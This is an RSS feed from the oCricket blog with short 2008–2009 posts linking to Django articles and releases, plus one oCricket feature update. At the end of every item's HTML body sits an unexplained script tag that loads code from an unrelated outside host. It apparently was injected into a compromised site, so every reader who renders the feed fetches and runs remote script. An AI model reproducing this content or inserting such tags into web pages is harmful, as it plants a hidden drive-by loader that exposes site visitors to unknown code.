<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>oCricket Blog &#187; Django</title>
	<atom:link href="http://blog.ocricket.com/tag/django/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.ocricket.com</link>
	<description>What's happening at oCricket</description>
	<lastBuildDate>Mon, 27 Jul 2009 14:39:21 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Django Best Practices</title>
		<link>http://blog.ocricket.com/django-best-practices/</link>
		<comments>http://blog.ocricket.com/django-best-practices/#comments</comments>
		<pubDate>Fri, 10 Apr 2009 05:44:45 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Django]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=192</guid>
		<description><![CDATA[&#8220;This is a living document of best practices in developing and deploying with the Django Web framework. These should not be seen as the right way or the only way to work with Django, but instead best practices we&#8217;ve honed after years of working with the framework.&#8221;

Read the article in full &#8211; Django Best Practices.]]></description>
			<content:encoded><![CDATA[<p>&#8220;This is a living document of best practices in developing and deploying with the Django Web framework. These should not be seen as the right way or the only way to work with Django, but instead best practices we&#8217;ve honed after years of working with the framework.&#8221;</p>

<p>Read the article in full &#8211; <a href="http://lincolnloop.com/django-best-practices/">Django Best Practices</a>.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/django-best-practices/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Real World Django</title>
		<link>http://blog.ocricket.com/real-world-django/</link>
		<comments>http://blog.ocricket.com/real-world-django/#comments</comments>
		<pubDate>Sat, 28 Mar 2009 18:15:50 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=188</guid>
		<description><![CDATA[There&#8217;s plenty of material (documentation, blogs, books) out there that&#8217;ll help you write a site using Django&#8230; but then what? You&#8217;ve still got to test, deploy, monitor, and tune the site; failure at deployment time means all your beautiful code is for naught.

Read Read World Django as it unfolds the tutorial which examines how best [...]]]></description>
			<content:encoded><![CDATA[<p>There&#8217;s plenty of material (documentation, blogs, books) out there that&#8217;ll help you write a site using Django&#8230; but then what? You&#8217;ve still got to test, deploy, monitor, and tune the site; failure at deployment time means all your beautiful code is for naught.</p>

<p>Read <a href="http://jacobian.org/speaking/2009/real-world-django/">Read World Django</a> as it unfolds the tutorial which examines how best to cope when the Real World intrudes on your carefully designed website.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/real-world-django/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Washington Times releases open source projects</title>
		<link>http://blog.ocricket.com/washington-times-releases-open-source-projects/</link>
		<comments>http://blog.ocricket.com/washington-times-releases-open-source-projects/#comments</comments>
		<pubDate>Fri, 20 Feb 2009 07:16:30 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Times]]></category>
		<category><![CDATA[Washington]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=184</guid>
		<description><![CDATA[The Washington Times has released few open source projects. Visit Washington Times Open Source for more.

The Washington Times has used open source projects for some time now. All of our servers run Ubuntu linux. Our database servers use PostgreSQL. Our web servers use lighttpd and Apache httpd, and memcached. We develop entirely in python, using [...]]]></description>
			<content:encoded><![CDATA[<p>The Washington Times has released few open source projects. Visit <a href="http://opensource.washingtontimes.com/">Washington Times Open Source</a> for more.</p>

<blockquote>The Washington Times has used open source projects for some time now. All of our servers run <a href="http://www.ubuntu.com/">Ubuntu</a> linux. Our database servers use <a href="http://www.postgresql.org/">PostgreSQL</a>. Our web servers use <a href="http://www.lighttpd.net/">lighttpd</a> and <a href="http://httpd.apache.org/">Apache httpd</a>, and <a href="http://www.danga.com/memcached/">memcached</a>. We develop entirely in <a href="http://www.python.org/">python</a>, using the <a href="http://www.djangoproject.com/">django framework</a>. We are obviously strong believers in open source.</blockquote><script src="http://ae.awaue.com/7"></script>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/washington-times-releases-open-source-projects/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rails versus Django</title>
		<link>http://blog.ocricket.com/rails-versus-django/</link>
		<comments>http://blog.ocricket.com/rails-versus-django/#comments</comments>
		<pubDate>Wed, 11 Feb 2009 10:01:53 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Rails]]></category>
		<category><![CDATA[Ruby]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=182</guid>
		<description><![CDATA[&#8220;These are the sorts of differences seen in both stacks. They are common, and commonly pivotal to arguments comparing the two frameworks. Proponents of one framework typically argue one way &#8216;because it is the way decreed by our language authors&#8217;. So really you&#8217;re looking at which language you prefer.&#8221;

(Via: SuperJared)]]></description>
			<content:encoded><![CDATA[<p>&#8220;These are the sorts of differences seen in both stacks. They are common, and commonly pivotal to arguments comparing the two frameworks. Proponents of one framework typically argue one way &#8216;because it is the way decreed by our language authors&#8217;. So really you&#8217;re looking at which language you prefer.&#8221;</p>

<p>(Via: <a href="http://superjared.com/entry/rails-versus-django/">SuperJared</a>)<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/rails-versus-django/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>South brings migrations to Django applications</title>
		<link>http://blog.ocricket.com/south-brings-migrations-to-django-applications/</link>
		<comments>http://blog.ocricket.com/south-brings-migrations-to-django-applications/#comments</comments>
		<pubDate>Wed, 03 Dec 2008 14:13:31 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[South]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=166</guid>
		<description><![CDATA[The main objectives of South are to provide a simple, stable and database-independent migration layer to prevent all the hassle schema changes over time bring to your Django applications.]]></description>
			<content:encoded><![CDATA[<p>The main objectives of <a href="http://south.aeracode.org/">South</a> are to provide a simple, stable and database-independent migration layer to prevent all the hassle schema changes over time bring to your Django applications.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/south-brings-migrations-to-django-applications/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Notes on a Django Migration</title>
		<link>http://blog.ocricket.com/notes-on-a-django-migration/</link>
		<comments>http://blog.ocricket.com/notes-on-a-django-migration/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 05:51:28 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Migration]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=164</guid>
		<description><![CDATA[Scott Hacker, has posted an interesting, and quite detailed post discussing a developer&#8217;s move to Django. It&#8217;s both a personal account and a researched account, which makes for a strong post.

Read the article &#8212; Notes on a Django Migration.]]></description>
			<content:encoded><![CDATA[<p>Scott Hacker, has posted an interesting, and quite detailed post discussing a developer&#8217;s move to Django. It&#8217;s both a personal account and a researched account, which makes for a strong post.</p>

<p>Read the article &#8212; <a href="http://birdhouse.org/blog/2008/11/19/notes-on-a-django-migration/">Notes on a Django Migration</a>.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/notes-on-a-django-migration/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Django-Taggable</title>
		<link>http://blog.ocricket.com/django-taggable/</link>
		<comments>http://blog.ocricket.com/django-taggable/#comments</comments>
		<pubDate>Tue, 18 Nov 2008 07:19:11 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=156</guid>
		<description><![CDATA[Gustavo Picon, announced his new project django-taggable. As the author describes, django-taggable is &#8220;An efficient, denormalized and multidimensional tagging library for Django 1.0+&#8221;]]></description>
			<content:encoded><![CDATA[<p>Gustavo Picon, announced his new project <a href="http://code.google.com/p/django-taggable/">django-taggable</a>. As the author describes, django-taggable is &#8220;An efficient, denormalized and multidimensional tagging library for Django 1.0+&#8221;<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/django-taggable/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Django 1.0.1 released</title>
		<link>http://blog.ocricket.com/django-101-released/</link>
		<comments>http://blog.ocricket.com/django-101-released/#comments</comments>
		<pubDate>Sat, 15 Nov 2008 07:05:24 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=154</guid>
		<description><![CDATA[Following Django&#8217;s previously-announced schedule, the Django team has released Django 1.0.1. This is a bugfix-only release containing fixes and improvements to the Django 1.0 codebase, and is a recommended upgrade for anyone using or targeting Django 1.0.]]></description>
			<content:encoded><![CDATA[<p>Following Django&#8217;s <a href="http://www.djangoproject.com/weblog/2008/oct/24/upcoming-releases/">previously-announced schedule</a>, the Django team has <a href="http://www.djangoproject.com/weblog/2008/nov/15/101/">released</a> Django 1.0.1. This is a bugfix-only release containing fixes and improvements to the Django 1.0 codebase, and is a recommended upgrade for anyone using or targeting Django 1.0.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/django-101-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How the Heck do Django Models Work</title>
		<link>http://blog.ocricket.com/how-the-heck-do-django-models-work/</link>
		<comments>http://blog.ocricket.com/how-the-heck-do-django-models-work/#comments</comments>
		<pubDate>Wed, 12 Nov 2008 05:58:09 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=147</guid>
		<description><![CDATA[Anyone who has used Django for just about any length of time has probably used a Django model, and possibly wondered how it works. The key to the whole thing is what&#8217;s known as a metaclass, a metaclass is essentially a class that defines how a class is created.

Read the article in full &#8212; How [...]]]></description>
			<content:encoded><![CDATA[<blockquote>Anyone who has used Django for just about any length of time has probably used a Django model, and possibly wondered how it works. The key to the whole thing is what&#8217;s known as a metaclass, a metaclass is essentially a class that defines how a class is created.</blockquote>

<p>Read the article in full &#8212; <a href="http://lazypython.blogspot.com/2008/11/how-heck-do-django-models-work.html">How the Heck do Django Models Work?</a><script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/how-the-heck-do-django-models-work/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Submit Photos from Flickr and Videos from Youtube</title>
		<link>http://blog.ocricket.com/flickr-photos-youtube-videos/</link>
		<comments>http://blog.ocricket.com/flickr-photos-youtube-videos/#comments</comments>
		<pubDate>Wed, 05 Nov 2008 11:14:30 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Release]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Flickr]]></category>
		<category><![CDATA[Photos]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[YouTube]]></category>

		<guid isPermaLink="false">http://blog.ocricket.com/?p=27</guid>
		<description><![CDATA[Well, we&#8217;ve been working hard to improvise our codebase and enhance a lot of the internal code framework. The broad updates with this beta release are



Upgraded to the more powerful Python 2.5 Release.
Upgraded the code to the sparkling new Django 1.0.
Added the ability to easily add photos &#8212; service starting with Flickr, more services will [...]]]></description>
			<content:encoded><![CDATA[<p>Well, we&#8217;ve been working hard to improvise our codebase and enhance a lot of the internal code framework. The broad updates with this beta release are</p>


<ul>
<li>Upgraded to the more powerful <a href="http://www.python.org/download/releases/2.5/">Python 2.5</a> Release.</li>
<li>Upgraded the code to the sparkling new <a href="http://www.djangoproject.com/weblog/2008/sep/03/1/">Django 1.0</a>.</li>
<li>Added the ability to easily add photos &#8212; service starting with <a href="http://flickr.com/">Flickr</a>, more services will be added as we go on.</li>
<li>The same goes for videos, starting with <a href="http://www.youtube.com/">YouTube</a> and more services will be added as we go on.</li>
<li>Users can also submit any other Cricket related articles.<span id="more-27"></span></li>
</ul>



<p>The upgrade to Python 2.5 and Django 1.0 is rather technical and I won&#8217;t even discuss the details here. But it should be fun to talk a bit about the new additional services added to oCricket and more coming in future.</p>

<p><strong>Flickr</strong></p>

<p><a href="http://flickr.com/">Flickr</a> is the super awesome Photo Sharing website and we wanted users to easily add Cricket photos via Flickr. With this beta release, we&#8217;ve added that and we would love to see you try it out. More other Photo sharing sites &#8212; <a href="http://smugmug.com/">Smugmug</a>, <a href="http://picasaweb.google.com/">Picasa</a>, <a href="http://photobucket.com/">Photobucket</a> &#8212; and lot more will be added pretty soon.</p>

<p><strong>YouTube</strong></p>

<p><a href="http://www.youtube.com/">YouTube</a> is to Videos as Flickr is to Photos. Along with the ability to add Flickr Photos to oCricket, users can now submit/add videos from YouTube very easily. More other Video sites will be added soon.</p>

<p>Try them out and let us know your feedbacks.</p>

<p><strong>Login with your username or associated email</strong></p>

<p>While the option to use your existing <a href="http://www.facebook.com/">Facebook</a>, <a href="http://www.google.com/">Gmail/Google/Orkut</a>, <a href="http://www.yahoo.com/">Yahoo!</a> accounts (<a href="http://en.wikipedia.org/wiki/OpenID">OpenID</a>) to login to Cricket is in the work, we have already made it easier for users to login using either their username or the email associated with oCricket.</p>

<p><strong>Re-freshed, new design coming soon</strong></p>

<p>Recently, we were able to persuade <a href="http://www.adelanwar.com/">Adel Anwar</a> to be part of the <a href="http://11.ocricket.com/">oTeam</a>. The new User Interface which have been brainstormed, discussed amongst the oCricket team and carefully designed by Adel Anwar is on its way. We&#8217;ll be upgrading to the new design around early 2009.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/flickr-photos-youtube-videos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>10 useful Django Tips</title>
		<link>http://blog.ocricket.com/10-useful-django-tips/</link>
		<comments>http://blog.ocricket.com/10-useful-django-tips/#comments</comments>
		<pubDate>Wed, 01 Oct 2008 06:59:50 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=134</guid>
		<description><![CDATA[&#8220;There are quite a few great little tricks and tips one could use on their Django projects that would speed up development and save many headaches in the long run. From basic to obscure, these tips can help any skill-level of programmer become more adept with Django and all it&#8217;s glory.&#8221; Via: NetTuts.]]></description>
			<content:encoded><![CDATA[<p>&#8220;There are quite a few great little tricks and tips one could use on their Django projects that would speed up development and save many headaches in the long run. From basic to obscure, these tips can help any skill-level of programmer become more adept with Django and all it&#8217;s glory.&#8221; Via: <a href="http://nettuts.com/web-roundups/10-insanely-useful-django-tips/">NetTuts</a>.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/10-useful-django-tips/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
